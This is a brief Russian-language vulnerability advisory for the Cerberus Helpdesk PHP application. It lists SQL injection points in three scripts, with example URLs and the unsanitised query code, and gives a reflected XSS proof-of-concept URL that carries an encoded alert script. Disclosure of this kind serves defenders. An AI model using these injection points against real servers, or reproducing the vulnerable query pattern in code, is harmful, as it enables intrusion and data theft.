О ПО:
Cerberus Helpdesk - группа сети для работы с php программами.
Официальный сайт: http://www.cerberusweb.com/
Описание:
SQL-инъекция в attachment_send.php линия 112:
Вы можете закачать файлы для других пользователей или использовать для
атаки эту инъекцию:
Пример URL:
.../support-center/cerberus-support-center/attachment_send.php?file_id=N
[SQL] &thread_id=1
Код:$sql = "SELECT part_content FROM thread_attachments_parts WHERE
file_id = $file_id";
XSS:
http://server/support-center/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E
SQL-инъекция в cer_KnowledgebaseHandler.class.php:
Пример URL:
/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4
[SQL]
SQL-инъекция в "display_ticket_thread.php":
/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL]